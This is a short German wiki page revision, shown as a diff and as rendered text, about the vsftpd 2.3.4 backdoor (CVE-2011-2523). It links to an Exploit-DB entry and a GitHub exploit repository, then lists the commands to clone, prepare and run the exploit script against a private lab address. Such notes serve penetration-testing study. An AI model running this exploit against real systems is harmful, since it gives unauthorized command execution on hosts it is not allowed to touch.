CVE: 2011-2523: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
(Die Seite wurde neu angelegt: „=vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)= ==Exloitdb== *https://www.exploit-db.com/exploits/17491 ==Github== *git clonehttps://github.com/ahervi…“)
 
Zeile 7: Zeile 7:
 
==Script wurde unter Windows erstellt==
 
==Script wurde unter Windows erstellt==
 
*dos2unix vsftpd_234_exploit.py
 
*dos2unix vsftpd_234_exploit.py
==Ausführbar machen=
+
=Ausführbar machen=
 
*chmod +x vsftpd_234_exploit.py
 
*chmod +x vsftpd_234_exploit.py
 +
 
=Exploit=
 
=Exploit=
 
*./vsftpd_234_exploit.py 10.0.10.105 21 hostname
 
*./vsftpd_234_exploit.py 10.0.10.105 21 hostname

Version vom 17. Mai 2022, 10:14 Uhr

vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)

Exloitdb

Github

  • git clonehttps://github.com/ahervias77/vsftpd-2.3.4-exploit
  • vsftpd-2.3.4-exploit

Script wurde unter Windows erstellt

  • dos2unix vsftpd_234_exploit.py

Ausführbar machen

  • chmod +x vsftpd_234_exploit.py

Exploit

  • ./vsftpd_234_exploit.py 10.0.10.105 21 hostname